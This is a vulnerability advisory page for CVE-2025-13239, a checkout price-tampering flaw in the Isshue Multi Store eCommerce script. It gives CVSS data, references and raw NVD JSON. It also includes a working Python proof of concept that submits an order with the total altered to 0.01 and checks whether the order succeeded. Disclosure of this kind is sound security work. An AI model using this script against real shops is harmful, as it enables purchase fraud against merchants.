CVE-2025-13239

Description

A security vulnerability has been detected in Bdtask/CodeCanyon Isshue Multi Store eCommerce Shopping Cart Solution 5. Affected by this issue is some unknown functionality of the file /submit_checkout. Such manipulation of the argument order_total_amount/cart_total_amount leads to enforcement of behavioral workflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:bdtask:isshue:5.0:*:*:*:*:*:*:* - VULNERABLE

Isshue Multi Store eCommerce Shopping Cart Solution 5 (具体版本未知)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re

# CVE-2025-13239 PoC - Isshue eCommerce Parameter Tampering
# Target: /submit_checkout endpoint
# Attack: Manipulate order_total_amount/cart_total_amount parameters

def exploit_isshue_cve_2025_13239(target_url):
    """
    POC for CVE-2025-13239: Parameter tampering in Isshue checkout process
    This demonstrates manipulating order_total_amount parameter
    """
    
    target = target_url.rstrip('/')
    checkout_url = f"{target}/submit_checkout"
    
    # Normal legitimate request (for comparison)
    legitimate_payload = {
        'cart_total_amount': '299.99',
        'order_total_amount': '299.99',
        'shipping_method': 'standard',
        'payment_method': 'credit_card',
        'address_id': '1'
    }
    
    # Malicious request - tampering with order_total_amount
    tampered_payload = {
        'cart_total_amount': '299.99',
        'order_total_amount': '0.01',  # Tampered value
        'shipping_method': 'standard',
        'payment_method': 'credit_card',
        'address_id': '1'
    }
    
    print(f"[*] Target: {target}")
    print(f"[*] Checkout endpoint: {checkout_url}")
    print("\n[+] Sending tampered request...")
    
    try:
        response = requests.post(checkout_url, data=tampered_payload, timeout=10)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)} bytes")
        
        if response.status_code == 200:
            if 'success' in response.text.lower() or 'order' in response.text.lower():
                print("[!] Potential vulnerability confirmed - order processed")
                return True
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:
        exploit_isshue_cve_2025_13239(sys.argv[1])
    else:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13239
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13239
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13239/
[4] VulDB https://vuldb.com/cve/CVE-2025-13239
[5] https://github.com/4m3rr0r/PoCVulDb/issues/7
[6] https://vuldb.com/?ctiid.332565
[7] https://vuldb.com/?id.332565
[8] https://vuldb.com/?submit.686896

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13239", "sourceIdentifier": "[email protected]", "published": "2025-11-16T06:15:43.237", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Bdtask/CodeCanyon Isshue Multi Store eCommerce Shopping Cart Solution 5. Affected by this issue is some unknown functionality of the file /submit_checkout. Such manipulation of the argument order_total_amount/cart_total_amount leads to enforcement of behavioral workflow. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-840"}, {"lang": "en", "value": "CWE-841"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bdtask:isshue:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "8A8F955C-BFC1-4D11-9AAE-3EE14F7E3771"}]}]}], "references": [{"url": "https://github.com/4m3rr0r/PoCVulDb/issues/7", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332565", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332565", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.686896", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}